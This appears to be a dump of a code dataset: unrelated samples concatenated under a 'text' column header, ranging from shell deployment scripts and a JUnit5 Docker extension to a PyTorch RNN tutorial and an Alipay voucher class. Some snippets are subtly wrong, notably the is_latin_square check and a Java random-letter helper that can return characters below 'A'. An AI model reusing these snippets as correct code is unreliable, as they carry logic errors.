text
stringlengths
1
1.05M
#!/bin/bash # Collect stats for each active wireless interface # I'm adding the following commented command as a placeholder, in case systemd decides to assign goofy names # to wifi interfaces. It's something to check. # ip -a link | grep -v link | awk '{print $2}' This will show a list of just the interface names # as they would appear in /proc/net/wireless. It could then create variables to add in the subroutine below. for i in $(grep -o 'wlan' /proc/net/wireless) do # we could just do wifistats=$(grep wlan /proc/net/wireless) # but that's less fun # using this method, you can just gather the fields you want. wifistats=$(awk '/wlan/{print $1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11}' /proc/net/wireless) echo $(date "+%Y_%m_%d_%M_%S") $wifistats >> /etc/saildrone/system.wireless done
#!/bin/bash EC2_ENABLED=${EC2:-"true"} EBS_ENABLED=${EBS:-"true"} ELB_ENABLED=${ELB:-"true"} RDS_ENABLED=${RDS:-"true"} SQS_ENABLED=${SQS:-"true"} SNS_ENABLED=${SNS:-"true"} EC_ENABLED=${EC:-"true"} ECR_ENABLED=${ECR:-"true"} if [ -z "$NEWRELIC_KEY" ]; then echo "NEWRELIC_KEY not detected, did you forget to set it with -e NEWRELIC_KEY=yourkey?" exit 1 fi if [ -z "$AWS_ACCESS_KEY" ]; then echo "AWS_ACCESS_KEY not detected, did you forget to set it with -e AWS_ACCESS_KEY=yourkey?" exit 1 fi if [ -z "$AWS_SECRET_KEY" ]; then echo "AWS_SECRET_KEY not detected, did you forget to set AWS_SECRET_KEY=yoursecret?" exit 1 fi echo "Replacing keys" sed -e "s#YOUR_LICENSE_KEY_HERE#$NEWRELIC_KEY#g" -i /usr/local/newrelic_aws_cloudwatch_plugin-latest/config//newrelic_plugin.yml && \ sed -e "s#YOUR_AWS_ACCESS_KEY_HERE#$AWS_ACCESS_KEY#g" -i /usr/local/newrelic_aws_cloudwatch_plugin-latest/config//newrelic_plugin.yml && \ sed -e "s#YOUR_AWS_SECRET_KEY_HERE#$AWS_SECRET_KEY#g" -i /usr/local/newrelic_aws_cloudwatch_plugin-latest/config//newrelic_plugin.yml && \ echo "Replacing settings" sed -e "s/EC2_ENABLED/$EC2_ENABLED/g" -i /usr/local/newrelic_aws_cloudwatch_plugin-latest/config//newrelic_plugin.yml && \ sed -e "s/EBS_ENABLED/$EBS_ENABLED/g" -i /usr/local/newrelic_aws_cloudwatch_plugin-latest/config//newrelic_plugin.yml && \ sed -e "s/ELB_ENABLED/$ELB_ENABLED/g" -i /usr/local/newrelic_aws_cloudwatch_plugin-latest/config//newrelic_plugin.yml && \ sed -e "s/RDS_ENABLED/$RDS_ENABLED/g" -i /usr/local/newrelic_aws_cloudwatch_plugin-latest/config//newrelic_plugin.yml && \ sed -e "s/SQS_ENABLED/$SQS_ENABLED/g" -i /usr/local/newrelic_aws_cloudwatch_plugin-latest/config//newrelic_plugin.yml && \ sed -e "s/SNS_ENABLED/$SNS_ENABLED/g" -i /usr/local/newrelic_aws_cloudwatch_plugin-latest/config//newrelic_plugin.yml && \ sed -e "s/EC_ENABLED/$EC_ENABLED/g" -i /usr/local/newrelic_aws_cloudwatch_plugin-latest/config//newrelic_plugin.yml && \ sed -e "s/ECR_ENABLED/$ECR_ENABLED/g" -i /usr/local/newrelic_aws_cloudwatch_plugin-latest/config//newrelic_plugin.yml && \ echo "Starting new relic aws plugin agent..." exec "$@"
<reponame>wesharedev/webapp<filename>src/components/Layout/Footer/styles.js export default (theme) => { return { footerContainer: { width: '100%', alignItems: 'center', flexDirection: 'row', justifyContent: 'center', display: 'flex', backgroundColor: 'white', }, footer : { marginLeft: 'auto', marginRight: 'auto', alignSelf: 'center', display: 'flex', flexDirection: 'row', alignItems: 'flex-start', justifyContent: 'space-between', backgroundColor: 'white', paddingTop: 40, paddingBottom: 40, [theme.breakpoints.down('md')]: { width: '90%', }, }, aboutContainer: { display: 'flex', flexDirection: 'column', justifyContent: 'center', }, aboutResponsiveContainer: { display: 'flex', flexDirection: 'column', maxWidth: '100%', justifyContent: 'center', }, logo: { height: '40px', objectFit: 'contain', alignSelf: 'flex-start', }, socialLogo: { height: 'fit-content', width: 'fit-content', alignItems: 'flex-start', }, socialLogoContainer: { display: 'flex', flexDirection: 'row', }, about: { marginTop: 16, marginBottom: 16, }, ml26: { marginLeft: 26, }, mb16: { marginBottom: 16, }, linkContainer: { display: 'flex', flexDirection: 'row', justifyContent: 'space-between', alignItems: 'flex-start', alignSelf: 'center', width: '100%', marginBottom: 40, marginTop: 40, }, testVersion: { color: theme.palette.common.base5, }, link: { textDecoration: 'none', }, } }
def is_latin_square(arr): # Get the number of rows and columns rows = len(arr) cols = len(arr[0]) # Create a set for the rows and columns row_set = set() col_set = set() # Iterate through the array and add elements to the sets for i in range(rows): for j in range(cols): row_set.add(arr[i][j]) col_set.add(arr[j][i]) # Check if the sizes of the sets are equal to the size of the array if len(row_set) == rows and len(col_set) == cols: return True else: return False arr = [[1,2,3], [2,3,1], [3,1,2]] result = is_latin_square(arr) print(result)
<reponame>837477/PyTorch_study<gh_stars>1-10 import torch import torch.nn as nn import torch.optim as optim import numpy as np # 훈련 데이터 전처리 input_str = 'apple' label_str = 'pple!' char_vocab = sorted(list(set(input_str+label_str))) vocab_size = len(char_vocab) print ('문자 집합의 크기 : {}'.format(vocab_size)) input_size = vocab_size # 입력의 크기는 문자 집합의 크기 hidden_size = 5 output_size = 5 learning_rate = 0.1 # 고유 정수 부여 char_to_index = dict((c, i) for i, c in enumerate(char_vocab)) # 문자에 고유한 정수 인덱스 부여 print(char_to_index) # 나중에 예측 결과를 다시 문자 시퀀스로 변경하기 위한 index index_to_char={} for key, value in char_to_index.items(): index_to_char[value] = key print(index_to_char) x_data = [char_to_index[c] for c in input_str] y_data = [char_to_index[c] for c in label_str] print(x_data) print(y_data) # 배치 차원 추가 # 텐서 연산인 unsqueeze(0)를 통해 해결할 수도 있었음. x_data = [x_data] y_data = [y_data] print(x_data) print(y_data) # 원-핫 인코딩 x_one_hot = [np.eye(vocab_size)[x] for x in x_data] print(x_one_hot) # 학습 데이터 준비 완료 (텐서 변경) X = torch.FloatTensor(x_one_hot) Y = torch.LongTensor(y_data) # RNN 모델 구현 class Net(torch.nn.Module): def __init__(self, input_size, hidden_size, output_size): super(Net, self).__init__() self.rnn = torch.nn.RNN(input_size, hidden_size, batch_first=True) # RNN 셀 구현 self.fc = torch.nn.Linear(hidden_size, output_size, bias=True) # 출력층 구현 def forward(self, x): # 구현한 RNN 셀과 출력층을 연결 x, _status = self.rnn(x) x = self.fc(x) return x net = Net(input_size, hidden_size, output_size) criterion = torch.nn.CrossEntropyLoss() optimizer = optim.Adam(net.parameters(), learning_rate) for i in range(100): optimizer.zero_grad() outputs = net(X) loss = criterion(outputs.view(-1, input_size), Y.view(-1)) # view를 하는 이유는 Batch 차원 제거를 위해 loss.backward() # 기울기 계산 optimizer.step() # 아까 optimizer 선언 시 넣어둔 파라미터 업데이트 # 아래 세 줄은 모델이 실제 어떻게 예측했는지를 확인하기 위한 코드. result = outputs.data.numpy().argmax(axis=2) # 최종 예측값인 각 time-step 별 5차원 벡터에 대해서 가장 높은 값의 인덱스를 선택 result_str = ''.join([index_to_char[c] for c in np.squeeze(result)]) print(i, "loss: ", loss.item(), "prediction: ", result, "true Y: ", y_data, "prediction str: ", result_str)
import java.util.Random; public class RandomChar { public static char getRandomChar() { Random random = new Random(); int randomInt = random.nextInt() % 26; // get a number between 0 and 25 int randomCharNum = 65 + randomInt; // 65 is the ASCII number for the character 'A' return (char) randomCharNum; } }
## arg 1: the new package version post_install() { update-desktop-database /usr/share/applications echo "Se actualizo la base de datos" }
import re def extract_ids(code_snippet): # Regular expression pattern to match variable assignments pattern = r'(\w+)\s*=\s*(\d+)' # Find all matches in the code snippet matches = re.findall(pattern, code_snippet) # Extract the IDs from the matches ids = [int(match[1]) for match in matches] return ids
#!/bin/bash sleep 10 foreman start
package image import "fmt" type StageID struct { Signature string `json:"signature"` UniqueID string `json:"uniqueID"` } func (id StageID) String() string { return fmt.Sprintf("signature:%s uniqueID:%s", id.Signature, id.UniqueID) } type StageDescription struct { StageID *StageID `json:"stageID"` Info *Info `json:"info"` }
package no.mnemonic.commons.jupiter.docker; import no.mnemonic.commons.utilities.ObjectUtils; import no.mnemonic.commons.utilities.StringUtils; import no.mnemonic.commons.utilities.collections.CollectionUtils; import no.mnemonic.commons.utilities.collections.MapUtils; import no.mnemonic.commons.utilities.collections.SetUtils; import no.mnemonic.commons.utilities.lambda.LambdaUtils; import org.junit.jupiter.api.extension.*; import org.mandas.docker.client.DockerClient; import org.mandas.docker.client.builder.resteasy.ResteasyDockerClientBuilder; import org.mandas.docker.client.messages.ContainerConfig; import org.mandas.docker.client.messages.ContainerInfo; import org.mandas.docker.client.messages.HostConfig; import org.mandas.docker.client.messages.PortBinding; import java.util.*; import java.util.concurrent.TimeUnit; import java.util.concurrent.TimeoutException; import java.util.function.Supplier; import java.util.stream.Collectors; import static no.mnemonic.commons.utilities.ObjectUtils.ifNull; import static no.mnemonic.commons.utilities.collections.ListUtils.list; import static no.mnemonic.commons.utilities.collections.MapUtils.Pair.T; import static no.mnemonic.commons.utilities.collections.MapUtils.map; /** * DockerExtension is a JUnit5 extension which starts up an isolated Docker container in a unit test, for example for * integration tests against an external database. DockerExtension will start up the container only once before all * tests and will make sure that the container is teared down after all tests (i.e. when the JVM shuts down). * <p> * In order to start up a container the following steps are performed: * <ol> * <li>Initialize a Docker client. If the $DOCKER_HOST environment variable is set it will connect to the Docker * installation specified by this variable. Otherwise it will try to connect to localhost on TCP port 2375 (default * Docker daemon port).</li> * <li>Initialize and start up a Docker container specified by the name of a Docker image. It is expected that the * Docker image is already installed (for example by performing 'docker pull').</li> * <li>Test that the container is reachable. See {@link #isContainerReachable()} for more information.</li> * <li>Prepare the container with additional data. See {@link #prepareContainer()} for more information.</li> * </ol> * <p> * After all tests are finished, either successfully, with an exception or by user cancellation, the running container * is stopped and removed in order to not leave stale containers behind. * <p> * Initialize DockerExtension in the following way using {@link RegisterExtension}: * <pre> * {@code @RegisterExtension * public static DockerExtension docker = DockerExtension.builder() * .setImageName("busybox") * .setReachabilityTimeout(30) * .addApplicationPort(8080) * .build();} * </pre> * See {@link DockerExtension.Builder} for more information on the configuration properties. * <p> * This class provides a basic Docker extension but it is most useful to extend it and override {@link #isContainerReachable()} * and {@link #prepareContainer()} for more specific use cases, for instance when testing a specific database. * See {@link CassandraDockerExtension} as an example. * <p> * <h3>Proxy settings</h3> * The DockerExtension will by default use system properties to determine proxy settings when communicating with the * docker daemon. To completely disable proxy, you can set the system property "-DDockerExtension.disable.proxy=true". */ public class DockerExtension implements BeforeAllCallback, BeforeEachCallback, AfterEachCallback, AfterAllCallback { private static final String DOCKER_HOST_ENVIRONMENT_VARIABLE = "DOCKER_HOST"; private static final int DEFAULT_DOCKER_DAEMON_PORT = 2375; private static final int DEFAULT_STOP_TIMEOUT_SECONDS = 10; private static final int DEFAULT_REACHABILITY_TIMEOUT_SECONDS = 30; private final String imageName; private final Set<String> applicationPorts; private final String exposedPortsRange; private final int reachabilityTimeout; private final boolean skipReachabilityCheck; private final Supplier<DockerClient> dockerClientResolver; private final Map<String, String> environmentVariables; private DockerClient docker; private String containerID; /** * Constructor to override by subclasses. * * @param imageName Name of Docker image (required) * @param applicationPorts Application ports available inside the container (at least one is required) * @param exposedPortsRange Range of ports for mapping to the outside of the container (optional) * @param reachabilityTimeout Timeout until testing that container is reachable stops (optional) * @param skipReachabilityCheck If set skip testing that container is reachable (optional) * @param dockerClientResolver Function to resolve DockerClient (optional) * @param environmentVariables Container's environment variables (optional) * @throws IllegalArgumentException If one of the required parameters is not provided */ protected DockerExtension(String imageName, Set<Integer> applicationPorts, String exposedPortsRange, int reachabilityTimeout, boolean skipReachabilityCheck, Supplier<DockerClient> dockerClientResolver, Map<String, String> environmentVariables) { if (StringUtils.isBlank(imageName)) throw new IllegalArgumentException("'imageName' not provided!"); if (CollectionUtils.isEmpty(applicationPorts)) throw new IllegalArgumentException("'applicationPorts' not provided!"); if (!skipReachabilityCheck && reachabilityTimeout <= 0) throw new IllegalArgumentException("'reachabilityTimeout' not provided!"); this.imageName = imageName; this.applicationPorts = Collections.unmodifiableSet(applicationPorts.stream() .filter(Objects::nonNull) .map(String::valueOf) .collect(Collectors.toSet())); this.exposedPortsRange = exposedPortsRange; this.reachabilityTimeout = reachabilityTimeout; this.skipReachabilityCheck = skipReachabilityCheck; this.dockerClientResolver = ifNull(dockerClientResolver, (Supplier<DockerClient>) this::resolveDockerClient); this.environmentVariables = Collections.unmodifiableMap(environmentVariables); // Make sure to always shutdown any containers in order to not leave stale containers on the host machine, // e.g. in case of exceptions or when the user stops the tests. This won't work if the JVM process is killed. Runtime.getRuntime().addShutdownHook(new Thread(this::shutdownContainer)); } /** * Returns the host where the started Docker container is available. It takes the $DOCKER_HOST environment variable * into account and falls back to 'localhost' if the variable is not specified. * * @return Host where the started Docker container is available */ public String getExposedHost() { return DockerTestUtils.getDockerHost(); } /** * DockerResource will map the application ports, which are the ports applications listen to inside the container, * to random ports on the host machine, which can be used to communicate with the applications. For example, * the application port 8080 could be mapped to random port 33333 on the host machine. * <p> * This method returns the exposed host port for a given application port. * * @param applicationPort Application port inside container * @return Exposed port on host machine * @throws IllegalStateException If mapped host port cannot be determined */ public int getExposedHostPort(int applicationPort) { int hostPort; try { // Fetch container information and find binding for application port which contains the exposed host port. ContainerInfo info = docker.inspectContainer(containerID); // Return first available TCP host port bound to application port. hostPort = map(info.networkSettings().ports()) .getOrDefault(applicationPort + "/tcp", list()) .stream() .map(PortBinding::hostPort) .map(Integer::parseInt) .findFirst() .orElse(0); } catch (Exception ex) { throw new IllegalStateException("Could not determine exposed host port.", ex); } if (hostPort <= 0) { throw new IllegalStateException("Could not determine exposed host port."); } return hostPort; } /** * Create builder for DockerExtension. * * @return Builder object */ public static <T extends Builder<?>> Builder<T> builder() { return new Builder<>(); } /** * Subclasses can override this method in order to apply additional configuration to the host inside the container. * <p> * If not overridden the default configuration will be used. * * @param config Default configuration as set up by DockerExtension * @return Modified host configuration */ protected HostConfig additionalHostConfig(HostConfig config) { // By default, return host configuration unchanged. return config; } /** * Subclasses can override this method in order to apply additional configuration to the container itself. * <p> * If not overridden the default configuration will be used. * * @param config Default configuration as set up by DockerExtension * @return Modified container configuration */ protected ContainerConfig additionalContainerConfig(ContainerConfig config) { // By default, return container configuration unchanged. return config; } /** * Subclasses can override this method in order to implement a check to determine if a container is reachable. After * start up of the container this method will be called until it either returns true or 'reachabilityTimeout' is * reached. If the container is not reachable until 'reachabilityTimeout' starting up DockerExtension will fail with * a TimeoutException. * <p> * If not overridden the method immediately returns true. * * @return True if container is reachable */ protected boolean isContainerReachable() { // By default, just return true. return true; } /** * Subclasses can override this method in order to prepare a container once before tests are executed, for example by * initializing a database with a schema or inserting some application data into a database. This method is called * once after it was determined that the container is reachable by {@link #isContainerReachable()}. * <p> * If not overridden the method does nothing. */ protected void prepareContainer() { // By default, do nothing. } /** * Expose DockerClient used by DockerExtension to subclasses. Use this client when overriding {@link #isContainerReachable()} * or {@link #prepareContainer()}. * * @return DockerClient used by DockerExtension */ public DockerClient getDockerClient() { return docker; } /** * Expose containerID of the started container to subclasses. Use this containerID when overriding {@link #isContainerReachable()} * and {@link #prepareContainer()} in order to communicate with the started container directly. * * @return containerID of started container */ public String getContainerID() { return containerID; } /** * Initialize DockerExtension before executing tests. It should not be necessary to override this method. * * @throws Exception If initialization fails */ @Override public void beforeAll(ExtensionContext context) throws Exception { synchronized (DockerExtension.class) { // Only initialize everything once. It will be automatically teared down when the JVM shuts down. if (docker == null) { initializeDockerClient(); initializeContainer(); testContainerReachability(); prepareContainer(); } } } /** * Subclasses can override this method in order to implement specific @BeforeEach behaviour. */ @Override public void beforeEach(ExtensionContext context) { // By default, do nothing. DockerExtension must implement this method such // that SingletonDockerExtensionWrapper can handle @BeforeEach properly. } /** * Subclasses can override this method in order to implement specific @AfterEach behaviour. */ @Override public void afterEach(ExtensionContext context) { // By default, do nothing. DockerExtension must implement this method such // that SingletonDockerExtensionWrapper can handle @AfterEach properly. } /** * Teardown DockerExtension after executing tests. It should not be necessary to override this method. */ @Override public void afterAll(ExtensionContext context) { synchronized (DockerExtension.class) { if (docker != null) { shutdownContainer(); docker = null; } } } private DockerClient resolveDockerClient() { try { if (!StringUtils.isBlank(System.getenv(DOCKER_HOST_ENVIRONMENT_VARIABLE))) { // If DOCKER_HOST is set create docker client from environment variables. return new ResteasyDockerClientBuilder() .fromEnv() .useProxy(useProxySettings()) .build(); } else { // Otherwise connect to localhost on the default daemon port. return new ResteasyDockerClientBuilder() .uri(String.format("http://localhost:%d", DEFAULT_DOCKER_DAEMON_PORT)) .useProxy(useProxySettings()) .build(); } } catch (Exception ex) { throw new IllegalStateException("Could not create docker client.", ex); } } private boolean useProxySettings() { // Allow user to turn off proxy autodetection by setting this property using a system property. return !Boolean.parseBoolean(ifNull(System.getProperty("DockerExtension.disable.proxy"), "false")); } private void initializeDockerClient() { this.docker = dockerClientResolver.get(); try { // Check that docker daemon is reachable. if (!"OK".equals(docker.ping())) { throw new IllegalStateException("ping() did not return OK."); } } catch (Exception ex) { throw new IllegalStateException("Could not connect to docker daemon.", ex); } } private void initializeContainer() { PortBinding portBinding = StringUtils.isBlank(exposedPortsRange) ? PortBinding.randomPort("0.0.0.0") : PortBinding.of("0.0.0.0", exposedPortsRange); // Bind ports on the host to the application ports of the container randomly or with configured range. // Also apply any additional host configuration by calling additionalHostConfig(). HostConfig hostConfig = additionalHostConfig(HostConfig.builder() .portBindings(map(applicationPorts, port -> T(port, list(portBinding)))) .build()); // Convert provided environmental variables to appropriate docker format. List<String> env = environmentVariables.entrySet() .stream() .map(e -> String.format("%s=%s", e.getKey(), e.getValue())) .collect(Collectors.toList()); // Configure container with the image to start and host port -> application port bindings. // Also apply any additional container configuration by calling additionalContainerConfig(). ContainerConfig containerConfig = additionalContainerConfig(ContainerConfig.builder() .image(imageName) .exposedPorts(applicationPorts) .hostConfig(hostConfig) .env(env) .build()); try { containerID = docker.createContainer(containerConfig).id(); docker.startContainer(containerID); } catch (Exception ex) { throw new IllegalStateException(String.format("Could not start container (image '%s').", imageName), ex); } } private void shutdownContainer() { // Ignore exceptions because the container goes down anyways. LambdaUtils.tryTo(() -> { if (docker == null || StringUtils.isBlank(containerID)) return; docker.stopContainer(containerID, DEFAULT_STOP_TIMEOUT_SECONDS); docker.removeContainer(containerID); }); // But always release client connection. ObjectUtils.ifNotNullDo(docker, DockerClient::close); } private void testContainerReachability() throws Exception { if (skipReachabilityCheck) return; if (!LambdaUtils.waitFor(this::isContainerReachable, reachabilityTimeout, TimeUnit.SECONDS)) { throw new TimeoutException("Could not connect to container before timeout."); } } /** * Builder to create a DockerExtension. * <p> * Subclasses of DockerExtension can also define own builders extending this builder in order to be able to configure * the same properties. The configurable properties are exposed as protected fields which can be passed to the * constructor of a subclass. This constructor in turn should pass them to the constructor of DockerExtension. * See {@link CassandraDockerExtension.Builder} as an example. */ public static class Builder<T extends Builder<?>> { protected String imageName; protected Set<Integer> applicationPorts; protected String exposedPortsRange; protected int reachabilityTimeout = DEFAULT_REACHABILITY_TIMEOUT_SECONDS; protected boolean skipReachabilityCheck; protected Supplier<DockerClient> dockerClientResolver; protected Map<String, String> environmentVariables = new HashMap<>(); /** * Build a configured DockerExtension. * * @return Configured DockerExtension */ public DockerExtension build() { return new DockerExtension(imageName, applicationPorts, exposedPortsRange, reachabilityTimeout, skipReachabilityCheck, dockerClientResolver, environmentVariables); } /** * Set image name of container to use. The image must be available in Docker, it is not automatically pulled! * * @param imageName Image name * @return Builder */ public T setImageName(String imageName) { this.imageName = imageName; return (T) this; } /** * Set application ports which will be used inside the container and exposed outside of the container by mapping to * ports inside the range specified with {@link #setExposedPortsRange(String)} or random ports. * <p> * Also see {@link #getExposedHostPort(int)} for more information. * * @param applicationPorts Set of application ports * @return Builder */ public T setApplicationPorts(Set<Integer> applicationPorts) { this.applicationPorts = applicationPorts; return (T) this; } /** * Add a single application port which will be used inside the container and exposed outside of the container by * mapping to a port inside the range specified with {@link #setExposedPortsRange(String)} or a random port. * <p> * Also see {@link #getExposedHostPort(int)} for more information. * * @param applicationPort Single application port * @return Builder */ public T addApplicationPort(int applicationPort) { this.applicationPorts = SetUtils.addToSet(this.applicationPorts, applicationPort); return (T) this; } /** * Set port range which will be used for exposing ports inside the container to the outside of the container. * * @param exposedPortsRange String in format "firstPort-lastPort" which is used for setting a range of ports * @return Builder */ public T setExposedPortsRange(String exposedPortsRange) { this.exposedPortsRange = exposedPortsRange; return (T) this; } /** * Set timeout in seconds until test for container reachability stops. Defaults to 30 seconds if not set. * <p> * Also see {@link #isContainerReachable()} for more information. * * @param reachabilityTimeout Timeout in seconds * @return Builder */ public T setReachabilityTimeout(int reachabilityTimeout) { this.reachabilityTimeout = reachabilityTimeout; return (T) this; } /** * Configure DockerExtension to skip test for container reachability. Useful if application code implements similar functionality. * * @return Builder */ public T skipReachabilityCheck() { this.skipReachabilityCheck = true; return (T) this; } /** * Override the default behaviour of how a DockerClient will be created by providing a custom resolver function. * Should be used with care, but useful for providing a mock during unit testing, for instance. * * @param dockerClientResolver Customer DockerClient resolver function * @return Builder */ public T setDockerClientResolver(Supplier<DockerClient> dockerClientResolver) { this.dockerClientResolver = dockerClientResolver; return (T) this; } /** * Set multiple environment variables for the container. * * @param variables Array of key-value pairs * @return Builder */ public T setEnvironmentVariables(MapUtils.Pair<String, String>... variables) { this.environmentVariables = MapUtils.map(variables); return (T) this; } /** * Add an additional environment variable for the container. * * @param key Variable name * @param value Variable value * @return Builder */ public T addEnvironmentVariable(String key, String value) { this.environmentVariables = MapUtils.addToMap(this.environmentVariables, key, value); return (T) this; } } }
#!/bin/bash export HOME=/root/ source $HOME/.bashrc source $HOME/conda/bin/activate conda activate tali cd $CODE_DIR git pull pip install -r $CODE_DIR/requirements.txt source $CODE_DIR/setup_scripts/setup_base_experiment_disk.sh source $CODE_DIR/setup_scripts/setup_wandb_credentials.sh cd $CODE_DIR fuser -k /dev/nvidia*; \ python $CODE_DIR/run.py \ hydra.verbose=True \ trainer=default \ resume=True \ batch_size=4 \ trainer.gpus=2 \ trainer.auto_scale_batch_size=True \ datamodule.dataset_config.rescan_paths=True \ datamodule.prefetch_factor=3 \ datamodule.num_workers=24 \ model=base_modus_prime_resnet50 \ datamodule.dataset_config.dataset_size_identifier=base \ datamodule.dataset_config.modality_config.image=True \ datamodule.dataset_config.modality_config.text=True \ datamodule.dataset_config.modality_config.audio=False \ datamodule.dataset_config.modality_config.video=True
<filename>components/PopOver/style/less.js import '../../Transitions/style/less.js'; import '../../Helpers/style/less.js'; import './index.less'
#!/bin/bash set -e . $(dirname "$0")/common.sh if [ "$FEATURES_ENVIRONMENT" == "" ]; then echo "[ERROR]: No FEATURES_ENVIRONMENT provided" exit 1 fi if [ "$FEATURES" == "" ]; then echo "[ERROR]: No FEATURES provided" exit 1 fi # expect oc to be in PATH by default export OC_TOOL="${OC_TOOL:-oc}" # Deploy features success=0 iterations=0 sleep_time=10 max_iterations=72 # results in 12 minutes timeout until [[ $success -eq 1 ]] || [[ $iterations -eq $max_iterations ]] do feature_failed=0 for feature in $FEATURES; do feature_dir=feature-configs/${FEATURES_ENVIRONMENT}/${feature}/ if [[ ! -d $feature_dir ]]; then echo "[WARN] Feature '$feature' is not configured for environment '$FEATURES_ENVIRONMENT', skipping it" continue fi echo "[INFO] Deploying feature '$feature' for environment '$FEATURES_ENVIRONMENT'" set +e # be verbose on last iteration only if [[ $iterations -eq $((max_iterations - 1)) ]] || [[ -n "${VERBOSE}" ]]; then ${OC_TOOL} apply -k "$feature_dir" else ${OC_TOOL} apply -k "$feature_dir" &> /dev/null fi # shellcheck disable=SC2181 if [[ $? != 0 ]]; then echo "[WARN] Deployment of feature '$feature' failed." feature_failed=1 fi set -e done if [[ $feature_failed -eq 1 ]]; then iterations=$((iterations + 1)) iterations_left=$((max_iterations - iterations)) if [[ $iterations_left != 0 ]]; then echo "[WARN] Deployment did not fully succeed yet, retrying in $sleep_time sec, $iterations_left retries left" sleep $sleep_time else echo "[WARN] At least one deployment failed, giving up" fi else # All features deployed successfully success=1 fi done if [[ $success -eq 1 ]]; then echo "[INFO] Deployment successful" else echo "[ERROR] Deployment failed" exit 1 fi
'use strict' import { canUseWorker, urlFromVersion } from './compiler-utils' import { Compiler } from '@remix-project/remix-solidity' import { CompilerAbstract } from './compiler-abstract' export const compile = async (compilationTargets, settings, contentResolverCallback) => { return new Promise((resolve) => { const compiler = new Compiler(contentResolverCallback) compiler.set('evmVersion', settings.evmVersion) compiler.set('optimize', settings.optimize) compiler.set('language', settings.language) compiler.set('runs', settings.runs) compiler.loadVersion(canUseWorker(settings.version), urlFromVersion(settings.version)) compiler.event.register('compilationFinished', (success, compilationData, source) => { resolve(new CompilerAbstract(settings.version, compilationData, source)) }) compiler.event.register('compilerLoaded', () => compiler.compile(compilationTargets, '')) }) }
<filename>SPOJPL/SmallFactorial.py T = int(input()) func = lambda N : N and func(N - 1) * N or 1 for _ in range(T): K = int(input()) print(func(K))
<gh_stars>0 package com.alipay.api.domain; import java.util.List; import com.alipay.api.AlipayObject; import com.alipay.api.internal.mapping.ApiField; import com.alipay.api.internal.mapping.ApiListField; /** * 支付宝券详细信息 * * @author auto create * @since 1.0, 2021-07-22 15:25:26 */ public class VoucherItem extends AlipayObject { private static final long serialVersionUID = 1482169224225799688L; /** * 券可使用时间规则 */ @ApiListField("available_time_rule") @ApiField("voucher_time_rule") private List<VoucherTimeRule> availableTimeRule; /** * 券可使用过期时间,格式为:yyyy-MM-dd HH:mm:ss */ @ApiField("expire_time") private String expireTime; /** * 单品券商品信息 */ @ApiField("item_info") private VoucherSingleItemInfo itemInfo; /** * 优惠规则: 1)满减类型:券面额 2)折扣类型:折扣;单次封顶优惠金额 3)减至类型:减至金额 */ @ApiField("promo_info") private PromoInfo promoInfo; /** * 优惠类型,共三种。 代金(FIX),折扣(DISCOUNT),减至(SPECIAL) */ @ApiField("promo_type") private String promoType; /** * 用户领取时间,格式为yyyy-MM-dd HH:mm:ss */ @ApiField("receive_time") private String receiveTime; /** * 券可使用开始时间,格式为yyyy-MM-dd HH:mm:ss */ @ApiField("send_time") private String sendTime; /** * 券模板id */ @ApiField("template_id") private String templateId; /** * 消费门槛金额 */ @ApiField("threshold_amount") private String thresholdAmount; /** * 券不可使用时间规则 */ @ApiListField("unavailable_time_rule") @ApiField("voucher_time_rule") private List<VoucherTimeRule> unavailableTimeRule; /** * 券描述 */ @ApiField("voucher_desc") private String voucherDesc; /** * 券id */ @ApiField("voucher_id") private String voucherId; /** * 券名称 */ @ApiField("voucher_name") private String voucherName; /** * 券状态: 可用(ENABLED),已核销(即完全使用,USED),已过期(EXPIRED),不可用(DISABLED),删除(DELETE,已废弃), */ @ApiField("voucher_status") private String voucherStatus; /** * 券类型: 1)商家全场优惠券(ALIPAY_BIZ_VOUCHER) 2)商家单品优惠券(ALIPAY_COMMON_ITEM_VOUCHER) */ @ApiField("voucher_type") private String voucherType; public List<VoucherTimeRule> getAvailableTimeRule() { return this.availableTimeRule; } public void setAvailableTimeRule(List<VoucherTimeRule> availableTimeRule) { this.availableTimeRule = availableTimeRule; } public String getExpireTime() { return this.expireTime; } public void setExpireTime(String expireTime) { this.expireTime = expireTime; } public VoucherSingleItemInfo getItemInfo() { return this.itemInfo; } public void setItemInfo(VoucherSingleItemInfo itemInfo) { this.itemInfo = itemInfo; } public PromoInfo getPromoInfo() { return this.promoInfo; } public void setPromoInfo(PromoInfo promoInfo) { this.promoInfo = promoInfo; } public String getPromoType() { return this.promoType; } public void setPromoType(String promoType) { this.promoType = promoType; } public String getReceiveTime() { return this.receiveTime; } public void setReceiveTime(String receiveTime) { this.receiveTime = receiveTime; } public String getSendTime() { return this.sendTime; } public void setSendTime(String sendTime) { this.sendTime = sendTime; } public String getTemplateId() { return this.templateId; } public void setTemplateId(String templateId) { this.templateId = templateId; } public String getThresholdAmount() { return this.thresholdAmount; } public void setThresholdAmount(String thresholdAmount) { this.thresholdAmount = thresholdAmount; } public List<VoucherTimeRule> getUnavailableTimeRule() { return this.unavailableTimeRule; } public void setUnavailableTimeRule(List<VoucherTimeRule> unavailableTimeRule) { this.unavailableTimeRule = unavailableTimeRule; } public String getVoucherDesc() { return this.voucherDesc; } public void setVoucherDesc(String voucherDesc) { this.voucherDesc = voucherDesc; } public String getVoucherId() { return this.voucherId; } public void setVoucherId(String voucherId) { this.voucherId = voucherId; } public String getVoucherName() { return this.voucherName; } public void setVoucherName(String voucherName) { this.voucherName = voucherName; } public String getVoucherStatus() { return this.voucherStatus; } public void setVoucherStatus(String voucherStatus) { this.voucherStatus = voucherStatus; } public String getVoucherType() { return this.voucherType; } public void setVoucherType(String voucherType) { this.voucherType = voucherType; } }
public static String remove(String string) { StringBuilder result = new StringBuilder(); for (int i = 0; i < string.length(); i++) { if (string.charAt(i) != '!' && string.charAt(i) != '.') result.append(string.charAt(i)); } return result.toString(); }
import { createDrawerNavigator } from '@react-navigation/drawer'; import FeedDrawer from '../components/feedDrawer'; import Feed from '../pages/feed'; const Drawer = createDrawerNavigator(); const FeedNavigator: React.FC = () => { return ( <Drawer.Navigator drawerContent={() => <FeedDrawer />} screenOptions={{ swipeEnabled: false, }}> <Drawer.Screen component={Feed} name="Feed" options={{ headerShown: false }} /> </Drawer.Navigator> ); }; export default FeedNavigator;
